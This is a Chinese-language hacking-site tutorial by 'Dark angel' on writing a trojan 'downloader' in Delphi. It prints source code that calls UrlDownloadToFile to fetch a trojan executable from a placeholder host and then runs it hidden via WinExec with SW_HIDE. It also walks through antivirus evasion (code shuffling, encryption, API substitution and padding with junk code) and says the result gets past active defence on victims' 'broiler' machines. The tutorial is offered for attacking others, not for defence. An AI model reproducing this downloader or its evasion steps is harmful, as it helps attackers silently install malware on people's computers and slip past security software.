-----------------------------------------------------------------------------------
黑客动画吧 http://www.hack58.com

致力于中国最专业的黑客安全站点

黑客动画吧，有你更精彩
-----------------------------------------------------------------------------------
                               菜鸟也来编写下载者
大家好，我是Dark angel.因为麦克风坏了，无法给大家做语音教程，第一次教程跟大家见面.
今天我想教大家用delphi编写个下载者。这个教程没什么技术含量，6月3号我要跟牛牛工作室
一起合作，到时候才会有更多的时间跟大家谈下木马的制作等等，其他的就不多说了，继续来
我们下载者之旅程。
今天我们所说的编译下载者其实很简单，只要你下载好了delphi，完全可以写一个自己的小马
来。代码简简单单地几句，穿墙，自删，自启动的以后我会跟大家说。本人的教程以后制作出
来后会发布到黑客动画吧上面，大家关注黑客动画吧就可以看到我的教程了。
------------------------------------------------------
大家可能会问，没自启动的下载者感觉好象没有什么用
其实大家用下载者的，有自启动我感觉有点麻烦，会拖
慢肉鸡的网速，本人初次给大家做教程，所以就先做个
超级简单的教程教大家，以后慢慢来。
本节木马教程演示的下载者是在网上搜集回来的一份源码。
原来的源码已经是被杀的了，本节第一讲解如何编译它。
二来讲解如何免杀，三来是讲解让它多项下载。
------------------------------------------------------
******************************************************
原来的代码：已经被杀.
program hackdown;

uses urlmon,windows;  USES：声明。

begin

try
  UrlDownloadToFile(nil, Pchar('http://木马地址/木马.exe'), Pchar('C:\Program Files\木马.exe'), 0, nil);
//此句是说，下载http://木马地址/木马.exe这个木马，然后保存到C:\Program Files\木马.exe
finally
  winexec('C:\Program Files\木马.exe',SW_HIDE);
//这句呢，这句说的是用WINEXEC函数打开C:\Program Files\木马.exe.如果大家想隐藏运行的话可以更改SW_HIDE。
end;

end.

******************************************************
好了，现在我们来讲解如何免杀这个下载者。常见的免杀有：
打乱代码 代码加密 函数转换
从上面的代码来看，打乱代码已经是没什么可能的了，因为只有短短的两句，要是打乱了代码就会
先运行木马，再下载木马了.所以我们去掉打乱代码这个方法。我们来看第二个方法，代码加密。
这个已经反复实验过了，此方法已经实现木马免杀效果，不过只是编译比较麻烦，而且木马体积会
增大。那么函数转换呢？这个也可以.大家可以去DOWN个DELPHIAPI电子书来查下。因为这个教程我
已经想到用什么方法来制作出免杀效果了。所以大家跟着我来实验下。我这个方法给他起了个名字
叫：乱加代码法。大家可别笑呵。好了，我们现在COPY代码到DELPHI上。按CTRL+F9编译。
看。测试的程序弹出来了。刚才大家看到我的电脑上有很多个1-5.EXE程序，这是我教程前所测试的
多项下载。14.5 KB  14.5 KB  到底多了多少呢？程序增加了几个下载命令，但是程序不增大。而且运行正常顺畅。
好了。我的录象设置为1秒十页的。呆会可能会能大。不废话了快点了。刚刚按错。继续。我们看下能不能正常运行。
一样，正常运行顺畅，而且主动防御也过了。好了教程就说到这里吧。不废话了。完.
-------------------------------------------------------------------------------------
作者：Dark angel QQ：4600129 
牛牛工作室：www.trojan8.cn
-------------------------------------------------------------------------------------